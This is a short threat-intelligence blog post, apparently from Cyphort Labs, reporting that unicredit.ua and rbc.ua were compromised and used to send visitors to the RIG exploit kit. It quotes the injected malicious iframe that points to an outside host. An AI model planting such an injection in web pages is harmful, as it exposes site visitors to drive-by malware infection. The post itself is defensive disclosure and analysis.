The Ukrainian website unicredit.ua is the 704th most popular website in Ukraine, according to Alexa. This exploit does not trigger every time the site is loaded, so there must be some logic that controls the schedule of when the malware redirection occurs.
Here is the full infection chain:
In this case malvertising was not involved, instead the site itself was compromised, specifically there is an injection with
<iframe src=”http://oggy.co/wkap.php” width=”101″ height=”102″></iframe>
We reached out to UniCredit to notify them of this attack, but have not heard back so far.
Interestingly, this is not the only attack on a prominent Ukrainian website this week. We have seen the same attack, likely by the same group – on another high profile Ukrainian news site: rbc.ua , two days ago – on Jul 13 09:31 UTC time.
RBC stands for RosBusinessConsulting, which is a large media group listed on russian stock exchange as RBCM . It has more than 1500 employees and revenue of $81 million dollars. Here is the RBC.ua infection chain:
RIG exploit kit was also used in RBC.ua compromise. RIG is a popular exploit kit which has been around for about a year and sold on various “underground” forums. See the screenshot below (from http://www.malwaretech.com/, click to enlarge).
Cyphort Labs is monitoring this campaign and analyzing the payload executable and will share more results as soon as they become available.